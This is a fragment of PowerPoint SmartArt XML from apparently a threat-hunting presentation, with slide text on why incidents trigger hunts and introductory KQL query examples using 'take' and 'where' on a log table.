          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0AA4DDED-D452-4C7F-8999-335116540088}" type="parTrans" cxnId="{E8512FD0-5F48-4F87-93A9-FFEAF2C01A0D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3B3292E2-91EB-40DA-91D5-EE44319BFAC7}" type="sibTrans" cxnId="{E8512FD0-5F48-4F87-93A9-FFEAF2C01A0D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DC632E6B-9562-49C5-B647-F9D51EC19810}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU"/>
            <a:t>A security incident may also trigger a threat hunt</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD2467B0-E0F3-45BF-A81B-89E7F25AD2B9}" type="parTrans" cxnId="{C2D4E0DD-1E2E-4D26-A634-24FEE0C5C3B4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2B94126A-ED28-4101-94CC-4DBE2626B763}" type="sibTrans" cxnId="{C2D4E0DD-1E2E-4D26-A634-24FEE0C5C3B4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EA549C05-5637-4BA7-8754-EEDA3E0EB3BA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU" dirty="0"/>
            <a:t>Out of concern that the security tools have missed some of an attacker’s activity or can’t see it in some places</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A2A272C-60E0-470E-906E-BD5ECA66DBCC}" type="parTrans" cxnId="{7B2B4780-1039-49BE-9D1D-309E3A2BFC9D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{918CACE3-36A6-42DE-BAD4-6AA0A20FC4DF}" type="sibTrans" cxnId="{7B2B4780-1039-49BE-9D1D-309E3A2BFC9D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2F527680-3F60-4794-A77B-5CF516BC4000}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU"/>
            <a:t>Threat hunting is not an IoC sweep e.g. IP addresses/hashes only</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{338636B7-0676-4138-9407-CBED4167FA10}" type="parTrans" cxnId="{A2AFABAE-9DD8-443E-8BDF-332255B585C0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{490B5451-306A-4EDB-A7AC-0310FF4239DE}" type="sibTrans" cxnId="{A2AFABAE-9DD8-443E-8BDF-332255B585C0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BEFD4E1F-B369-414F-8BF9-C5E59023D735}" type="pres">
      <dgm:prSet presAssocID="{BE2B0E74-51C6-4840-8ED3-32540962ADE0}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D2CE137E-707C-4AED-8186-3DB4ACE4739E}" type="pres">
      <dgm:prSet presAssocID="{E3048171-CB2E-4CB6-833F-E8322DCA24C4}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{868483F8-8CC7-4D56-9A3C-B6D9A228A332}" type="pres">
      <dgm:prSet presAssocID="{E3048171-CB2E-4CB6-833F-E8322DCA24C4}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EDB73487-93E4-47B6-AB80-4B88A86DC0AE}" type="pres">
      <dgm:prSet presAssocID="{E3048171-CB2E-4CB6-833F-E8322DCA24C4}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{73294C5D-2BE7-4D89-BE11-60C46D6240EF}" type="pres">
      <dgm:prSet presAssocID="{499D75CE-B993-4923-9345-8E37F478AB49}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FFE45E58-B04D-42D7-8895-4BB8739B3403}" type="pres">
      <dgm:prSet presAssocID="{E862BD3D-8648-45F5-8D00-5495CE081325}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{75778759-C99A-471B-8C90-6C2C0A0EF0E7}" type="pres">
      <dgm:prSet presAssocID="{E862BD3D-8648-45F5-8D00-5495CE081325}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E345A7BA-D873-43ED-AA2D-F55E3960711F}" type="pres">
      <dgm:prSet presAssocID="{E862BD3D-8648-45F5-8D00-5495CE081325}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{17E7DF73-CB4D-4F5C-B07D-2B31B5F92C2E}" type="pres">
      <dgm:prSet presAssocID="{A812641F-6709-4E35-837D-46DCE10CA114}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BEF269C9-1ACA-4A6E-84B6-F2177D7B3DEE}" type="pres">
      <dgm:prSet presAssocID="{DC632E6B-9562-49C5-B647-F9D51EC19810}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7DF37FDD-C166-4BE8-ABB7-18FAE9B82B08}" type="pres">
      <dgm:prSet presAssocID="{DC632E6B-9562-49C5-B647-F9D51EC19810}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{76CEB6C0-87E8-44AC-A93F-A19143169660}" type="pres">
      <dgm:prSet presAssocID="{DC632E6B-9562-49C5-B647-F9D51EC19810}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{37368009-4031-455A-A3CD-352D60FA896C}" type="presOf" srcId="{3C6035B3-74B9-439F-98C1-E1AA0C63098E}" destId="{EDB73487-93E4-47B6-AB80-4B88A86DC0AE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DF66F420-0C7E-4D9A-9B41-0CADBE1FB056}" type="presOf" srcId="{E862BD3D-8648-45F5-8D00-5495CE081325}" destId="{75778759-C99A-471B-8C90-6C2C0A0EF0E7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B1F6A13D-EF07-4392-A2B4-8086997DF688}" type="presOf" srcId="{EA549C05-5637-4BA7-8754-EEDA3E0EB3BA}" destId="{76CEB6C0-87E8-44AC-A93F-A19143169660}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E63F636B-6C4F-4BA8-83BB-96A2F03717C6}" srcId="{BE2B0E74-51C6-4840-8ED3-32540962ADE0}" destId="{E862BD3D-8648-45F5-8D00-5495CE081325}" srcOrd="1" destOrd="0" parTransId="{D8EBD619-21D4-4C19-8737-F0BCE5E6E082}" sibTransId="{A812641F-6709-4E35-837D-46DCE10CA114}"/>
    <dgm:cxn modelId="{BA7EAE79-309B-4B39-B9E4-29A86EAA631C}" type="presOf" srcId="{BE2B0E74-51C6-4840-8ED3-32540962ADE0}" destId="{BEFD4E1F-B369-414F-8BF9-C5E59023D735}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{56A0067E-4D10-4A47-9F8E-3B0282995190}" srcId="{BE2B0E74-51C6-4840-8ED3-32540962ADE0}" destId="{E3048171-CB2E-4CB6-833F-E8322DCA24C4}" srcOrd="0" destOrd="0" parTransId="{F2945BB3-98D0-4357-9248-EA3B24363600}" sibTransId="{499D75CE-B993-4923-9345-8E37F478AB49}"/>
    <dgm:cxn modelId="{7B2B4780-1039-49BE-9D1D-309E3A2BFC9D}" srcId="{DC632E6B-9562-49C5-B647-F9D51EC19810}" destId="{EA549C05-5637-4BA7-8754-EEDA3E0EB3BA}" srcOrd="0" destOrd="0" parTransId="{6A2A272C-60E0-470E-906E-BD5ECA66DBCC}" sibTransId="{918CACE3-36A6-42DE-BAD4-6AA0A20FC4DF}"/>
    <dgm:cxn modelId="{6AE7CBAC-AE00-4D6E-A105-570058167D59}" srcId="{E3048171-CB2E-4CB6-833F-E8322DCA24C4}" destId="{3C6035B3-74B9-439F-98C1-E1AA0C63098E}" srcOrd="0" destOrd="0" parTransId="{2BAE1AC0-CB23-4EA6-9E0D-70D9CC1EE693}" sibTransId="{2E98C0EE-5AD4-4148-A7F5-2463C2ADC648}"/>
    <dgm:cxn modelId="{A2AFABAE-9DD8-443E-8BDF-332255B585C0}" srcId="{DC632E6B-9562-49C5-B647-F9D51EC19810}" destId="{2F527680-3F60-4794-A77B-5CF516BC4000}" srcOrd="1" destOrd="0" parTransId="{338636B7-0676-4138-9407-CBED4167FA10}" sibTransId="{490B5451-306A-4EDB-A7AC-0310FF4239DE}"/>
    <dgm:cxn modelId="{CF8B96B4-CFF4-4CF7-815D-0A55466FE6A1}" type="presOf" srcId="{8B1BB7A5-3C75-4064-9CAC-C278A3539BD7}" destId="{E345A7BA-D873-43ED-AA2D-F55E3960711F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{58545ACD-F1D7-4426-A4C4-D21F1C1C182E}" type="presOf" srcId="{2F527680-3F60-4794-A77B-5CF516BC4000}" destId="{76CEB6C0-87E8-44AC-A93F-A19143169660}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3D87F8CF-70EF-4AE0-89B5-98C72173D9FD}" type="presOf" srcId="{DC632E6B-9562-49C5-B647-F9D51EC19810}" destId="{7DF37FDD-C166-4BE8-ABB7-18FAE9B82B08}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E8512FD0-5F48-4F87-93A9-FFEAF2C01A0D}" srcId="{E862BD3D-8648-45F5-8D00-5495CE081325}" destId="{8B1BB7A5-3C75-4064-9CAC-C278A3539BD7}" srcOrd="0" destOrd="0" parTransId="{0AA4DDED-D452-4C7F-8999-335116540088}" sibTransId="{3B3292E2-91EB-40DA-91D5-EE44319BFAC7}"/>
    <dgm:cxn modelId="{948BB4DD-2656-4431-A5BB-5F4B83C0E586}" type="presOf" srcId="{E3048171-CB2E-4CB6-833F-E8322DCA24C4}" destId="{868483F8-8CC7-4D56-9A3C-B6D9A228A332}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{C2D4E0DD-1E2E-4D26-A634-24FEE0C5C3B4}" srcId="{BE2B0E74-51C6-4840-8ED3-32540962ADE0}" destId="{DC632E6B-9562-49C5-B647-F9D51EC19810}" srcOrd="2" destOrd="0" parTransId="{AD2467B0-E0F3-45BF-A81B-89E7F25AD2B9}" sibTransId="{2B94126A-ED28-4101-94CC-4DBE2626B763}"/>
    <dgm:cxn modelId="{8F79279C-5240-4DF0-B887-FE7C4861D9C1}" type="presParOf" srcId="{BEFD4E1F-B369-414F-8BF9-C5E59023D735}" destId="{D2CE137E-707C-4AED-8186-3DB4ACE4739E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E74A456A-8956-4F15-B969-6A2C9E0DBFCE}" type="presParOf" srcId="{D2CE137E-707C-4AED-8186-3DB4ACE4739E}" destId="{868483F8-8CC7-4D56-9A3C-B6D9A228A332}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{FE069100-350B-460D-A07A-A1AED6937419}" type="presParOf" srcId="{D2CE137E-707C-4AED-8186-3DB4ACE4739E}" destId="{EDB73487-93E4-47B6-AB80-4B88A86DC0AE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{23E3B2E7-4A2B-49BD-A802-E25B2E1F862E}" type="presParOf" srcId="{BEFD4E1F-B369-414F-8BF9-C5E59023D735}" destId="{73294C5D-2BE7-4D89-BE11-60C46D6240EF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E8A4B80D-FFC9-4E72-B8DE-B7B8F9CD6676}" type="presParOf" srcId="{BEFD4E1F-B369-414F-8BF9-C5E59023D735}" destId="{FFE45E58-B04D-42D7-8895-4BB8739B3403}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F1F2B720-4886-473F-BF5B-F0CEAC92F913}" type="presParOf" srcId="{FFE45E58-B04D-42D7-8895-4BB8739B3403}" destId="{75778759-C99A-471B-8C90-6C2C0A0EF0E7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{CF874F0F-179D-47A0-AE30-883BD53C5E60}" type="presParOf" srcId="{FFE45E58-B04D-42D7-8895-4BB8739B3403}" destId="{E345A7BA-D873-43ED-AA2D-F55E3960711F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6B3BA1B2-F797-47F7-8444-DDD2D2615A5F}" type="presParOf" srcId="{BEFD4E1F-B369-414F-8BF9-C5E59023D735}" destId="{17E7DF73-CB4D-4F5C-B07D-2B31B5F92C2E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{BC382444-837F-4BDD-B47A-6AC094426BD1}" type="presParOf" srcId="{BEFD4E1F-B369-414F-8BF9-C5E59023D735}" destId="{BEF269C9-1ACA-4A6E-84B6-F2177D7B3DEE}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{5D9B47D1-60DD-472B-BFAE-D6EE0A76078A}" type="presParOf" srcId="{BEF269C9-1ACA-4A6E-84B6-F2177D7B3DEE}" destId="{7DF37FDD-C166-4BE8-ABB7-18FAE9B82B08}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{7821998F-D61F-4AC9-AAD6-C44F8C00DF6F}" type="presParOf" srcId="{BEF269C9-1ACA-4A6E-84B6-F2177D7B3DEE}" destId="{76CEB6C0-87E8-44AC-A93F-A1914316966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8A6D4A-BC81-44E4-B510-DB1EDB3068F6}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/process1" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/colorful4" csCatId="colorful"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D9A70AA-D91D-4128-B8B0-4398C1BA7D2E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU"/>
            <a:t>First, make sure that your cluster is selected in the sidebar</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{08DBAC6C-6253-400E-B894-1DABDF0304BE}" type="parTrans" cxnId="{C40E7D5E-00AB-4992-8D68-95CDF58343C2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{82103D19-A198-4476-B58C-A22447FC96EE}" type="sibTrans" cxnId="{C40E7D5E-00AB-4992-8D68-95CDF58343C2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{15152B02-B62C-4EDA-870D-8C3E19A2E867}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU" dirty="0"/>
            <a:t>A KQL query starts with a table name and is then followed by any filters. By default, running this will show the maximum data possible, which may cause errors.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{32085000-3F19-44DF-AABD-26A9ECCE2368}" type="parTrans" cxnId="{87167B2D-E1C1-4F90-9A29-0E71E19B3DDB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C177B2B0-15A6-491F-8212-388FBB1625F8}" type="sibTrans" cxnId="{87167B2D-E1C1-4F90-9A29-0E71E19B3DDB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C17443C3-CE41-4313-9AEB-78958FB20851}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU"/>
            <a:t>Start with your new table and get the first 1000 rows like this:</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-AU"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-AU"/>
            <a:t>TableName</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-AU"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-AU"/>
            <a:t>| take 1000</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9D740830-6B21-43A9-8AFC-4FCECD979366}" type="parTrans" cxnId="{119BB084-9CD9-4A0D-89BF-B24489F170B3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A35D1AC-0AD7-4B3A-B4DF-EF12E3F73769}" type="sibTrans" cxnId="{119BB084-9CD9-4A0D-89BF-B24489F170B3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DA398265-252F-4010-AF98-8F87DAC60600}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU"/>
            <a:t>We can also filter data using </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" i="1"/>
            <a:t>where</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU"/>
            <a:t>, followed by any filters:</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-AU"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-AU"/>
            <a:t>TableName</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-AU"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-AU"/>
            <a:t>| where SomeColumn == “127.0.0.1” or Col2 contains “BLUECON”</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6801FB94-CEBC-4A1A-9705-5FF44B9ACFC9}" type="parTrans" cxnId="{AD31F937-45AF-4776-93A2-8CC3ABF8ACB3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{58B937D2-C178-468D-A7AF-B2B229610013}" type="sibTrans" cxnId="{AD31F937-45AF-4776-93A2-8CC3ABF8ACB3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{659AA652-0DD4-4B07-9DDB-C3E1E976EE42}" type="pres">
      <dgm:prSet presAssocID="{C28A6D4A-BC81-44E4-B510-DB1EDB3068F6}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7F941101-FEBD-4370-8B0B-F1FE04BF945E}" type="pres">
      <dgm:prSet presAssocID="{6D9A70AA-D91D-4128-B8B0-4398C1BA7D2E}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C56191A7-CEB1-4B79-84E0-C777FE9C6DD1}" type="pres">
      <dgm:prSet presAssocID="{82103D19-A198-4476-B58C-A22447FC96EE}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A71CA81B-E68C-40B7-AC75-239C00F18A23}" type="pres">
      <dgm:prSet presAssocID="{82103D19-A198-4476-B58C-A22447FC96EE}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{70B4470F-ACEC-4C5E-AA80-81A8B8E116C1}" type="pres">
      <dgm:prSet presAssocID="{15152B02-B62C-4EDA-870D-8C3E19A2E867}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{937B36A4-9B58-4FA0-8827-1EBB1DE4C60A}" type="pres">
      <dgm:prSet presAssocID="{C177B2B0-15A6-491F-8212-388FBB1625F8}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{035B2DE9-2942-4312-BEDB-C30DCA13FEF3}" type="pres">
      <dgm:prSet presAssocID="{C177B2B0-15A6-491F-8212-388FBB1625F8}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6DDB5530-8C47-43A1-B2AD-3322D5804479}" type="pres">
      <dgm:prSet presAssocID="{C17443C3-CE41-4313-9AEB-78958FB20851}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9BDFE564-DEB1-4B9F-8E53-3DD727AF27A7}" type="pres">
      <dgm:prSet presAssocID="{0A35D1AC-0AD7-4B3A-B4DF-EF12E3F73769}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B2C80EDE-1ED2-4BED-9037-48F82A109386}" type="pres">
      <dgm:prSet presAssocID="{0A35D1AC-0AD7-4B3A-B4DF-EF12E3F73769}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{80CF6733-AB7E-4659-B4FD-1C77A36087CE}" type="pres">
      <dgm:prSet presAssocID="{DA398265-252F-4010-AF98-8F87DAC60600}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{87167B2D-E1C1-4F90-9A29-0E71E19B3DDB}" srcId="{C28A6D4A-BC81-44E4-B510-DB1EDB3068F6}" destId="{15152B02-B62C-4EDA-870D-8C3E19A2E867}" srcOrd="1" destOrd="0" parTransId="{32085000-3F19-44DF-AABD-26A9ECCE2368}" sibTransId="{C177B2B0-15A6-491F-8212-388FBB1625F8}"/>
    <dgm:cxn modelId="{AD31F937-45AF-4776-93A2-8CC3ABF8ACB3}" srcId="{C28A6D4A-BC81-44E4-B510-DB1EDB3068F6}" destId="{DA398265-252F-4010-AF98-8F87DAC60600}" srcOrd="3" destOrd="0" parTransId="{6801FB94-CEBC-4A1A-9705-5FF44B9ACFC9}" sibTransId="{58B937D2-C178-468D-A7AF-B2B229610013}"/>
    <dgm:cxn modelId="{13AB6F3F-8E3E-4CE0-8950-E87C300A6BB3}" type="presOf" srcId="{82103D19-A198-4476-B58C-A22447FC96EE}" destId="{C56191A7-CEB1-4B79-84E0-C777FE9C6DD1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
